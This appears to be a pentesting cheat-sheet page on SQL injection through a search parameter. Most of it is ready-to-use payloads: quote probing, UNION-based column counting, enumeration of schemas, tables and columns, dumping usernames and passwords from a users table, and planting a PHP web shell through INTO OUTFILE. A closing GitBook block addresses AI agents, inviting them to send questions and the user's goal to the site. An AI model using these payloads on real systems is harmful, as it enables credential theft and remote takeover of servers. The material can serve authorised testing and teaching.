> For the complete documentation index, see [llms.txt](https://itrp19-notes.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://itrp19-notes.gitbook.io/notes/reference/hacking/web-app-pentesting/sql-injection/sql-injection-in-the-search-field.md).

# SQL Injection In The Search Field

### SQL Injection in search field

Let's say the search page is handled by a file named sql.php, and the parameter is search. Sql.php?search=pentesting The first thing we try is to search with single quote ‘

<pre><code><strong>Sql.php?search=<a data-footnote-ref href="#user-content-fn-1">’</a>
</strong></code></pre>

If it returns an error, then we know its vulnerable. Our next step is to determine the number of columns starting from running a normal query on the search box to get an idea. Finding the number of columns:

```
Sql.php?search=test’ ORDER BY 1-- - 
```

OR

```
Sql.php?search=' ORDER BY 1--
```

We keep incrementing the number until we hit an error which indicates the number of columns. Then we search for something similar to that below:

```
Sql.php?search=pentesting’ union select
1,1,1,1,1,1,1#
```

OR

```
Sql.php?search =' and 1 = 0 union all
select 1,1,1,1,1,1,1 from
information_schema.tables where 1=0 or
1=1-- '
```

We continue adding ‘1’s until we don’t receive any error from the page. Only then we know how many columns by counting the ‘1’s. Then we try to find the database name, table names, columns of target table

```
Sql.php?search=pentesting’ union select
1,database(),@@version,1,1,1,1#
```

OR

```
Sql.php?search =' and 1 = 0 union all
select 1,database(),@@version,1,1,1,1 from
information_schema.tables where 1=0 or
1=1-- '
```

```
Sql.php?search=pentesting’ union select
1,table_name,1,1,1,1,1 from
information_schema.tables#
```

OR

```
Sql.php?search =' and 1 = 0 union all
select 1,table_name,1,1,1,1,1 from
information_schema.tables where 1=0 or
1=1-- '
```

```
Sql.php?search=pentesting’ union select
1,column_name,1,1,1,1,1 from
information_schema.columns where
table_name=’users’#
```

OR

```
Sql.php?search =' and 1 = 0 union all
select 1,column_name,1,1,1,1,1 from
information_schema.columns where
table_name = 'users'-- '
```

```
Sql.php?search=pentesting’ union select
1,login,user,password,1,1,1 from users#
```

OR

```
Sql.php?search = ' and 1=0 union all
select
1,login,password,secret,email,admin,7 from
users-- -
```

```
Sql.php?search=pentesting’ union select 1,
"<?php echo shell_exec($_GET['cmd'])?
>",1,1,1,1,1 into outfile
"/var/www/html/shell3.php"#
```

OR

```
Sql.php?search= ' and 1=0 union all select
1, "<?php echo shell_exec($_GET['cmd'])?
```

```
>",1,1,1,1,1 into outfile
"/var/www/html/shell3.php"#
```

#### Another method after finding the number of columns.

Lets say we found there are three columns, we would continue this way

```
searchitem=test' UNION SELECT 1,2,3-- -
```

```
searchitem=test' UNION SELECT 1,(select
group_concat(SCHEMA_NAME) from
INFORMATION_SCHEMA.SCHEMATA),3-- -
```

The SCHEMATA table specifically contains the names of databases MySQL knows about.

```
searchitem=test' UNION SELECT 1,(select
group_concat(TABLE_NAME) from
INFORMATION_SCHEMA.TABLES WHERE
TABLE_SCHEMA = 'db'),3-- -
```

Extracting columns in a table

```
searchitem=test' UNION SELECT 1,(select
group_concat(COLUMN_NAME) from
INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME = 'users'),3-- -
```

extracting specific data from a column

```
searchitem=test' UNION SELECT 1,(select
username from db.users),3-- -
```

OR

```
searchitem=test' UNION SELECT 1,concat(id,
':', name, ':', password)from users,3-- -
```

#### Another method to finding the number of columns and proceeding further

```
' UNION select 1 from
information_schema.tables #
' UNION select 1,2 from
information_schema.tables #
' UNION select 1,2,3 from
information_schema.tables #
```

The one that returns a correct output is the one that indicates the number of columns Proceeding

```
' UNION select 1,table_schema,table_name
from information_schema.tables #
```

```
' UNION select 1,table_name,column_name
from information_schema.columns #
```

```
' UNION select 1,username,pwd from users #
```

[^1]:


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://itrp19-notes.gitbook.io/notes/reference/hacking/web-app-pentesting/sql-injection/sql-injection-in-the-search-field.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.